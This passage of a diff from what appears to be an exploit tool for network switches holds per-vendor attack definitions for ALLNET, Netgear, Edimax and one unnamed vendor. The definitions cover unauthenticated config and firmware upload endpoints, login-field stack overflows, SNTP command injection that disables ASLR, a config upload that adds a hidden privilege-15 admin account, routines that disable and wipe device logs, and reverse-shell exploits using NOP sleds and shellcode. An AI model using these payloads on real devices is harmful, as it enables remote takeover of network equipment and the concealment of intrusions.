+				'info_leak':False,
+				'info_leak_JSON':True,
+				'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
+				'xsid':False,
+				'xsid_uri':'/cgi/get.cgi?cmd=home_main',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'rsa',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
+					'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
+					'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'/cgi/set.cgi?cmd=log_global',
+						'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
+						'status':'/cgi/get.cgi?cmd=log_global',
+						'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
+						'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadruncfg.cgi',
+							'check_uri':'/tmp/http_saverun_cfg',
+							'content':'/var/config/running-config',
+							'content_check':'/var/config/running-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httprestorecfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/mnt/startup-config',
+							'content_check':'/mnt/startup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'/tmp/http_uploadfail',
+							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
+							'content_check':'Copy: Illegal software format',
+							'vulnerable': True,
+							'safe': True
+						},
+						'login.cgi': {
+							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
+							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
+							'content_check':'2',
+							'vulnerable': True,
+							'safe': True
+						},
+						'set.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'clear',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
+						'add_uri':'/cgi/httpuploadruncfg.cgi',
+						'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
+						'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,
+						'enable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_time',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_time',
+						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
+						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_time',
+						'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=0&dlsType=0&_de=1":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {	# Not vulnerable 
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
+						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',
+						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',
+
+						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': False,
+						#'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+						'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
+						'stack':True, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'ALLNET': {
+				'vendor': 'ALLNET GmbH Computersysteme',
+				'uri':'https://www.allnet.de/',
+				'modulus_uri':'',
+				'info_leak':False,
+				'info_leak_JSON':False,
+				'info_leak_uri':'',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':False,
+					'encryption':'clear',
+					'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+					'query':'username=USERNAME&password=PASSWORD&login=1',
+					'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
+					'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':False,
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'LOGGING_SERVICE=0&cmd=4353',
+						'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
+						'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logfile_query':'cmd_4364=Clear+file+messages',
+						'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': {
+						'httpuploadbakcfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadbakcfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadruncfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httprestorecfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'Image Signature Error',
+							'vulnerable': True,
+							'safe': True
+						},
+						'dispatcher.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadfirmware.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadfirmware.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'Image Signature Error',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload_runstart_cfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/tmp/startup-config',
+							'content_check':'/tmp/startup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'version_upgrade.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")',
+							'uri':'/cgi-bin/version_upgrade.cgi',
+							'check_uri':'',
+							'content':'Firm Upgrade',
+							'content_check':'Firm Upgrade',
+							'vulnerable': True,
+							'safe': True
+						},
+						'factory_reset.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Reset device to factory default (PoC: Too dangerous to verify)',
+							'uri':'/cgi-bin/factory_reset.cgi',
+							'check_uri':'',
+							'content':'Too dangerous to verify',
+							'content_check':'dummy',
+							'vulnerable': True,
+							'safe': False
+						},
+						'sysinfo_config.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':False,
+							'description':'System basic information configuration (Frontend to "change_mac_addr_set.cgi")',
+							'uri':'/cgi-bin/sysinfo_config.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'"/cgi-bin/change_mac_addr_set',
+							'vulnerable': True,
+							'safe': True
+						},
+						'change_mac_addr_set.cgi': {
+							'description':'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/change_mac_addr_set.cgi',
+							'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'json':False,
+						'authenticated': False,
+						'encryption':'clear',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
+						'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
+						'del_query':'', 
+						'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':False,
+						'authenticated': True,
+						'enable_uri':'/cgi-bin/dispatcher.cgi',
+						'enable_query':'sntp_enable=1&cmd=548',
+						'status_uri':'cmd=547',
+						'inject_uri':'/cgi-bin/dispatcher.cgi',
+
+						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
+						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
+
+						'delete_uri':'/cgi-bin/dispatcher.cgi',
+						'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'sntp_enable=0&cmd=548',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
+
+						'log_settings_set_cmd':'&LOGGING_SERVICE=0',			# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,						# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'',									# Clean RAM log CMD
+						'log_ramClear_SIGSEGV':False,							# Clean RAM log SIGSEGV ?
+
+						'log_fileClear_cmd':'',									# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':False,							# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
+						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
+						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
+						'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
+						'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
+						'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
+						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
+						'workaround':True,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+						'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
+						'workaround':False,	# My LAB workaround
+						#'stack':False, # False = use Heap, and there are no ASLR
+						'stack':True, # False = use Heap, and there are no ASLR
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Netgear': { 
+				'vendor': 'NETGEAR Inc.',
+				'modulus_uri':'/cgi/get.cgi?cmd=home_login',
+				'info_leak':True,
+				'info_leak_JSON':True,
+				'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
+				'xsid':False,
+				'xsid_uri':'/cgi/get.cgi?cmd=home_main',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'rsa',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
+					'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
+					'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+					'vulnerable': False,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'/cgi/set.cgi?cmd=log_settings',
+						'disable_query':'{"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1":{}}',
+						'status':'/cgi/get.cgi?cmd=log_settings',
+						'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',
+						'clean_logfile_query':'{"":{}}',
+						'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',
+						'clean_logmem_query':'{"":{}}',
+						'vulnerable': False,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'set.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': True # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'md5',
+						'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
+						'add_uri':'/cgi/httpuploadruncfg.cgi',
+						'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
+						'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',
+						'vulnerable': False,
+						'safe': True
+					}, 
+					'sntp': {
+						#
+						# Most probably it is vulnerable
+						#
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,
+						'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
+						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
+						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
+						'delete_query':'{"":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
+						'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': False,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {	# Not vulnerable 
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						'log_settings_set_cmd':'',					# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'',						# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'',						# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
+						'log_settings_set':0x00,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
+						'log_ramClear':0x00,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
+						'log_fileClear':0x00,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': False,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+						'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
+						'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',
+
+						'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=139',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
+						'sys_timeSntp_set':0x00,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
+						'sys_timeSntpDel_set':0x00,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
+						'sys_timeSettings_set':0x00,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': False,
+						'safe': True
+					}, 
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+						'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
+						'stack':True, # False = use Heap, and there are no ASLR
+
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x00,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x00,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': False,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Edimax': { 
+				'vendor': 'EDIMAX Technology Co., Ltd.',
+				'modulus_uri':'/cgi/get.cgi?cmd=home_login',
+				'info_leak':False,
+				'info_leak_JSON':True,
+				'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
+				'xsid':False,
+				'xsid_uri':'/cgi/get.cgi?cmd=home_main',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'rsa',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
+					'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
+					'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'/cgi/set.cgi?cmd=log_global',
+						'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
+						'status':'/cgi/get.cgi?cmd=log_global',
+						'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
+						'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadruncfg.cgi',
+							'check_uri':'/tmp/http_saverun_cfg',
+							'content':'/var/config/running-config',
+							'content_check':'/var/config/running-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httprestorecfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/mnt/startup-config',
+							'content_check':'/mnt/startup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'/tmp/http_uploadfail',
+							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
+							'content_check':'Copy: Illegal software format',
+							'vulnerable': True,
+							'safe': True
+						},
+						'login.cgi': {
